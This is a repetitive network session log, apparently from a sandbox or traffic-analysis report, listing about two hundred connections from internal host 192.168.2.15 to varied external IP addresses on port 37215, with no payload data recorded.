                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24506192.168.2.1559762222.148.126.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24507192.168.2.1545406222.21.153.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24508192.168.2.155819894.167.33.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24509192.168.2.1560028197.166.189.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24510192.168.2.1551262138.89.244.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24511192.168.2.153997441.130.200.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24512192.168.2.1539048186.13.88.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24513192.168.2.1543422197.194.124.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24514192.168.2.155224831.169.115.14037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24515192.168.2.1543126157.3.183.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24516192.168.2.1556878102.62.34.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24517192.168.2.156011045.120.78.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24518192.168.2.1549990197.78.163.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24519192.168.2.155947845.209.32.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24520192.168.2.154937637.66.133.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24521192.168.2.1558084222.48.26.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24522192.168.2.155954237.168.138.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24523192.168.2.154262837.53.6.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24524192.168.2.1538208197.57.227.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24525192.168.2.1535952222.229.172.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24526192.168.2.1540432190.16.141.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24527192.168.2.1556442222.252.174.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24528192.168.2.154079445.198.247.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24529192.168.2.155046041.32.44.10837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24530192.168.2.1551496157.8.238.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24531192.168.2.1546004181.122.124.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24532192.168.2.155876237.227.13.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24533192.168.2.1554402222.47.2.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24534192.168.2.1558536102.84.1.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24535192.168.2.1539650197.161.243.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24536192.168.2.1535892181.41.17.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24537192.168.2.155213231.92.232.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24538192.168.2.1550160138.136.26.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24539192.168.2.1548088222.8.40.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24540192.168.2.1548292156.126.59.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24541192.168.2.1549690222.174.15.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24542192.168.2.1557502102.228.47.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24543192.168.2.153827865.52.255.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24544192.168.2.1553594156.197.171.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24545192.168.2.1535456102.146.192.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24546192.168.2.155233094.255.110.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24547192.168.2.155388631.6.138.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24548192.168.2.1533628138.79.165.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24549192.168.2.1547714190.12.151.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24550192.168.2.1540460157.71.58.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24551192.168.2.1537580186.51.219.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24552192.168.2.154842231.235.9.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24553192.168.2.1543068156.52.97.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24554192.168.2.1555020121.96.138.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24555192.168.2.1543312156.225.46.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24556192.168.2.1556384222.30.95.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24557192.168.2.1551000102.227.164.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24558192.168.2.1549384122.69.200.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24559192.168.2.1535080222.91.251.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24560192.168.2.1555164190.140.34.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24561192.168.2.1546548157.45.70.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24562192.168.2.155578831.116.145.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24563192.168.2.1546586181.203.149.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24564192.168.2.155234013.220.155.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24565192.168.2.1536074222.44.40.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24566192.168.2.154638645.25.98.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24567192.168.2.1544066157.248.193.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24568192.168.2.154186245.95.192.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24569192.168.2.1533718138.131.95.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24570192.168.2.1551870186.56.173.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24571192.168.2.1546360156.31.117.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24572192.168.2.1544244157.180.35.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24573192.168.2.1534444181.196.20.9737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24574192.168.2.1533678222.133.141.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24575192.168.2.1545920157.189.188.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24576192.168.2.1536848156.46.40.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24577192.168.2.154989431.243.137.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24578192.168.2.1555872197.200.23.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24579192.168.2.155450437.241.141.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24580192.168.2.1536428190.234.155.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24581192.168.2.155875094.62.205.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24582192.168.2.153309689.251.67.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24583192.168.2.153356437.91.218.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24584192.168.2.153357445.231.41.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24585192.168.2.1549382156.56.10.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24586192.168.2.155062831.155.91.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24587192.168.2.155258045.162.60.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24588192.168.2.1537594121.157.241.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24589192.168.2.153838241.206.145.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24590192.168.2.1533438197.74.148.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24591192.168.2.1534532138.226.103.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24592192.168.2.1535490102.232.244.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24593192.168.2.1542404222.124.174.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24594192.168.2.154215894.128.249.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24595192.168.2.154483431.149.123.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24596192.168.2.1555376157.59.35.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24597192.168.2.1534796102.230.155.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24598192.168.2.1547202186.30.181.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24599192.168.2.154515494.169.248.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24600192.168.2.1535222121.246.108.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24601192.168.2.1551892197.181.26.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24602192.168.2.154309245.223.234.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24603192.168.2.1551986186.96.250.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24604192.168.2.154660496.61.114.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24605192.168.2.1560252156.40.1.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24606192.168.2.1544866102.175.1.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24607192.168.2.155628841.156.132.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24608192.168.2.155165237.118.206.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24609192.168.2.1548832213.11.82.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24610192.168.2.1543826122.246.99.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24611192.168.2.1538770186.172.148.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24612192.168.2.1535964181.237.165.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24613192.168.2.1555758138.30.156.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24614192.168.2.1537878190.147.109.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24615192.168.2.154741245.70.59.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24616192.168.2.155687241.27.59.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24617192.168.2.1538432140.178.113.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24618192.168.2.1548446186.80.78.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24619192.168.2.1560092102.150.96.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24620192.168.2.1553828122.105.165.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24621192.168.2.1550734102.18.12.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24622192.168.2.154699494.250.178.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24623192.168.2.155770645.48.209.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24624192.168.2.1542718121.164.181.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24625192.168.2.155553437.207.208.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24626192.168.2.1551028156.52.164.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24627192.168.2.155069445.69.180.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24628192.168.2.1541780222.40.55.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24629192.168.2.154159241.197.138.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24630192.168.2.1551666197.102.119.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24631192.168.2.1543382197.146.130.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24632192.168.2.1542356138.243.38.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24633192.168.2.155125241.168.179.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24634192.168.2.154867037.162.38.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24635192.168.2.153774641.117.90.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24636192.168.2.1533762197.111.29.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24637192.168.2.1539498102.63.47.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24638192.168.2.1551232121.155.205.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24639192.168.2.1553346197.175.124.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24640192.168.2.1552686102.42.180.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24641192.168.2.1542142138.60.137.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24642192.168.2.1546380181.205.202.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24643192.168.2.1557976138.7.131.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24644192.168.2.1553300102.175.208.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24645192.168.2.1545844186.69.239.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24646192.168.2.1550616190.249.167.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24647192.168.2.1557290197.230.3.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24648192.168.2.1551532197.31.48.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24649192.168.2.1539070157.237.148.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24650192.168.2.1559816186.15.70.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24651192.168.2.155835841.95.75.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24652192.168.2.1547744222.183.152.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24653192.168.2.1556236181.32.92.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24654192.168.2.155478241.165.200.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24655192.168.2.1552630157.118.69.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24656192.168.2.1548584122.190.137.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24657192.168.2.1556258190.157.5.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24658192.168.2.1541434190.74.251.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24659192.168.2.1535314156.233.222.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24660192.168.2.1541150156.222.22.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24661192.168.2.1536062138.144.116.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24662192.168.2.1544846186.9.212.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24663192.168.2.1538036156.111.18.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24664192.168.2.1539804197.143.20.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24665192.168.2.155800637.219.9.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24666192.168.2.1545850190.56.140.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24667192.168.2.154375831.118.9.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24668192.168.2.1557498121.186.84.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24669192.168.2.1553308122.182.128.4937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24670192.168.2.155759837.218.64.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24671192.168.2.155503631.221.75.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24672192.168.2.1538124181.98.6.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24673192.168.2.156020237.19.70.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24674192.168.2.153957252.84.160.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24675192.168.2.1554020181.149.148.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24676192.168.2.1560142121.60.42.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24677192.168.2.1557054190.54.190.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24678192.168.2.1560940102.126.242.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24679192.168.2.1554116157.121.235.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24680192.168.2.1534608156.236.243.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24681192.168.2.1550322157.209.14.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24682192.168.2.1556708222.82.82.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24683192.168.2.155627045.235.100.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24684192.168.2.1539814190.114.115.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24685192.168.2.154413841.116.120.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24686192.168.2.153503637.192.243.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24687192.168.2.1554306121.156.14.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24688192.168.2.153366045.243.86.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24689192.168.2.1549012122.231.205.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24690192.168.2.1536040181.135.58.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24691192.168.2.1553302181.75.176.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24692192.168.2.1544430181.175.34.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24693192.168.2.1534094157.22.84.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24694192.168.2.156002045.139.255.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24695192.168.2.153806041.170.16.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24696192.168.2.1555272197.199.128.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24697192.168.2.1544456102.95.53.7837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24698192.168.2.153590431.68.102.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24699192.168.2.1560698121.229.95.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24700192.168.2.1550342121.238.98.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24701192.168.2.155016437.66.56.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24702192.168.2.1560258157.182.122.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24703192.168.2.15422889.7.44.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24704192.168.2.1543676181.151.154.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24705192.168.2.1549768122.226.245.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24706192.168.2.1539724190.105.154.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24707192.168.2.155829837.103.251.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24708192.168.2.1559508181.185.175.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24709192.168.2.1543984157.150.120.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24710192.168.2.155746437.252.219.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24711192.168.2.1537680121.222.236.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24712192.168.2.1546974108.228.173.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24713192.168.2.1551956197.194.106.9337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24714192.168.2.1536594156.3.40.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24715192.168.2.154837845.24.179.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24716192.168.2.1534618222.241.204.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24717192.168.2.153802237.193.254.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24718192.168.2.1536552190.174.101.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24719192.168.2.1556462190.131.46.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24720192.168.2.154335031.176.52.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24721192.168.2.153354037.23.129.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24722192.168.2.155035831.66.36.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              24723192.168.2.1536838102.197.239.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
